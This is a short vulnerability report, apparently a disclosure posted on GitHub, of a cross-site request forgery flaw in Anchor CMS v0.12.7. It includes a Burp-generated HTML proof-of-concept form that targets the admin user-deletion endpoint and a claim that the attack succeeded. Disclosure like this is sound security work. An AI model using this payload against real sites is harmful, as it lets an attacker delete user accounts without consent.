Skip to content

Latest commit

 

History

History
31 lines (19 loc) · 777 Bytes

1.md

File metadata and controls

31 lines (19 loc) · 777 Bytes

target:https://github.com/anchorcms/anchor-cms version: v0.12.7

anchor cms v0.12.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /anchor/admin/users/delete/2

1

Poc:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/anchor/admin/users/delete/2">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>



2

Successed

3